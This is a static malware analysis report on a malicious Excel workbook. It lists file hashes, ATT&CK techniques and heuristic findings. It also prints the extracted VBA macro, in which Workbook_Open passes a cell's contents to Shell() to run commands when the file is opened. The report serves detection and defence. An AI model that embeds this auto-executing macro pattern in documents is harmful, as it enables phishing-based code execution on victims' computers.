Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 952ae01cb23df3d0…

MALICIOUS

Office (OOXML)

16.3 KB Created: 2020-06-23 05:03:50 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-18
MD5: 0890603b4e136a449cc0621f323e44e7 SHA-1: 7caa57f7dfc910dbab28e205b9715eda0044c072 SHA-256: 952ae01cb23df3d063f48a7f9991a62cfa5989a70f8c2c00f40d5fc6416d4eaa
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an OOXML document containing a Workbook_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary commands upon opening the document. The macro appears to be designed to execute data from Sheet1.Range("BG1"), which is then passed to Shell(). This is a common technique for downloading and executing a second-stage payload.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 699 bytes
SHA-256: 99f230b1bce0565b0932411892c2b608e4130bf8573d1a894fa9090fdb6bd42f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()

End Sub
Data = Sheet1.Range("BG1")
Shell (Data)
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 8704 bytes
SHA-256: f62f8ff156a95d0be7e35699a052270cf411e7a5a4182dd7dfab05c4e9ebaf51

Open this report in the interactive analyzer, or submit your own file for analysis.